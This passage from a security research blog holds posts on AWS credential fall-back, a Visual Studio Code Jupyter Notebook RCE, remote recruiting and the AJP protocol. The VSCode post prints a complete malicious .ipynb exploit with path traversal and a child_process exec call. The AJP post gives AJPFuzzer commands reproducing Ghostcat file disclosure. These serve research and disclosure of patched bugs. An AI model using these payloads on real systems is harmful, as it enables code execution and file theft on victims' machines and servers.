      • Is there a fall-back condition? Look if the end-user can reach that code path with some inputs. If it is used by default, go on - Look for the role’s permissions
    • aws.Config structure as input parameter - Look for the passed role’s permissions
  3. Can users abuse the functionality to make the platform use the privileged credentials on their behalf and point to private resources within the AWS account?

    e.g., “import from S3” functionality abused to import the infrastructure’s private buckets

For developers

Use AnonymousCredentials to configure the AWS SDK client when dealing with public resources.

From the official AWS documentations:

Using anonymous credentials will result in requests not being signed before sending them to the service. Any service that does not accept unsigned requests will return a service exception in this case.

In the case of user-provided credentials being used to integrate with other cloud services, the platform should avoid implementing fall-back-to-system-role patterns. Ensure that the user-provided credentials are correctly set to avoid ending up with aws.Config.Credentials = nil, because it would result in the client using the credentials provider chain → system role.
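
As a defensive sketch (aws-sdk-go v1; function and variable names are illustrative), build the client configuration strictly from user input and fail early instead of ever retrying with a nil Credentials object:

package importer

import (
	"fmt"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
)

// buildUserS3Config builds an aws.Config strictly from user-supplied input.
// It never falls back to the credential provider chain: missing keys mean
// anonymous access, and incomplete keys are rejected with an error.
func buildUserS3Config(region, accessKey, secretKey string) (*aws.Config, error) {
	cfg := &aws.Config{Region: aws.String(region)}

	if accessKey == "" && secretKey == "" {
		cfg.Credentials = credentials.AnonymousCredentials // public buckets only
		return cfg, nil
	}

	cfg.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	if _, err := cfg.Credentials.Get(); err != nil {
		// Get() fails here for empty/partial static keys; wrong keys surface
		// later as an S3 API error, which must be returned to the user rather
		// than "handled" by retrying with cfg.Credentials = nil.
		return nil, fmt.Errorf("incomplete user-supplied AWS credentials: %w", err)
	}
	return cfg, nil
}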

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Visual Studio Code Jupyter Notebook RCE

26 October 2022 at 22:00

I spent a few hours over the past weekend looking into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server, however it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation avenues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Facilitated by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

ElectroNG VScode

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

VScode BrowserWindow Design

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage reply to leak the path of the current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference of the img tag triggering the XSS by forcing the execution during the onload event.

Path Leak VScode

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file we still need to overcome one last limitation: the current implementation results in malformed JSON. The injection happens within a JSON file (double-quoted) and our JavaScript payload contains quoted strings, as well as double-quotes used as a delimiter for the regular expression that extracts the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.


The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

Recruiting Security Researchers Remotely

8 November 2022 at 23:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, the academic knowledge necessary to pass our code review challenge is similar to (but not limited to) what you'd find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview lasts about 45 minutes, during which we ask questions that help us understand the candidate's skillset and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability that is not there, or why someone missed a particular, easy-to-detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend that candidates feel comfortable with topics similar to those covered in the PortSwigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior to attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, only one working day in total. So, if the candidate is responsive, the whole process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

Let's speak AJP

14 November 2022 at 23:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol, especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to efficiently manage network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema
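For reference, a minimal configuration along these lines pairs an Apache httpd front end (mod_proxy_ajp) with a Tomcat AJP connector; the hostnames, ports and paths below are placeholders:

# Apache httpd (mod_proxy_ajp): forward /app to the backend container over AJP
ProxyPass "/app" "ajp://tomcat.internal:8009/app"

<!-- Tomcat conf/server.xml: AJP/1.3 connector listening on port 8009 -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

With this in place, httpd speaks plain HTTP to clients and AJP to the container, which is exactly the hop examined in the rest of this post.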

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potentially discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, it is a rudimentary fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz arbitrary elements within the packet.

With minor tuning, AJPFuzzer can also be used to quickly reproduce the Ghostcat vulnerability. In fact, we've successfully reproduced the attack by sending a crafted forwardrequest message including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the disclosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark
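To make the byte layout above more concrete, here is a minimal, self-contained Java sketch (independent of libajp13; the class name and values are illustrative) that hand-encodes a bare Forward Request packet the way the connector expects to receive it:

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class AjpForwardRequestSketch {

    // AJP strings are length-prefixed (2 bytes, big-endian) and null-terminated
    static void writeString(ByteArrayOutputStream out, String s) {
        byte[] bytes = s.getBytes(StandardCharsets.ISO_8859_1);
        out.write((bytes.length >> 8) & 0xFF);
        out.write(bytes.length & 0xFF);
        out.write(bytes, 0, bytes.length);
        out.write(0x00);
    }

    public static void main(String[] args) throws IOException {
        ByteArrayOutputStream payload = new ByteArrayOutputStream();
        payload.write(0x02);                 // prefix code 2 = Forward Request
        payload.write(0x02);                 // method code 2 = GET
        writeString(payload, "HTTP/1.1");    // protocol
        writeString(payload, "/");           // req_uri
        writeString(payload, "127.0.0.1");   // remote_addr
        writeString(payload, "localhost");   // remote_host
        writeString(payload, "localhost");   // server_name
        payload.write(0x1F);                 // server_port 8009 (high byte)
        payload.write(0x49);                 // server_port 8009 (low byte)
        payload.write(0x00);                 // is_ssl = false
        payload.write(0x00);                 // num_headers = 0 (2 bytes)
        payload.write(0x00);
        payload.write(0xFF);                 // request terminator (no attributes)

        // Packets sent from the web server to the container start with the
        // magic bytes 0x12 0x34, followed by the 2-byte payload length
        ByteArrayOutputStream packet = new ByteArrayOutputStream();
        packet.write(0x12);
        packet.write(0x34);
        packet.write((payload.size() >> 8) & 0xFF);
        packet.write(payload.size() & 0xFF);
        payload.writeTo(packet);

        System.out.printf("Encoded AJP Forward Request: %d bytes%n", packet.size());
    }
}

Request attributes such as javax.servlet.include.path_info are appended as name/value pairs just before the 0xFF terminator, which is exactly where the Ghostcat payload lives.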

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret (a sample configuration follows this list)
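As an illustration, on Tomcat 9.0.31+ the AJP connector can be bound to loopback and configured to require a shared secret, while recent versions of mod_proxy_ajp accept a matching secret worker parameter; the secret value below is a placeholder:

<!-- Tomcat conf/server.xml -->
<Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
           secretRequired="true" secret="replace-with-a-strong-secret" />

# Apache httpd (mod_proxy_ajp)
ProxyPass "/app" "ajp://127.0.0.1:8009/app" secret=replace-with-a-strong-secret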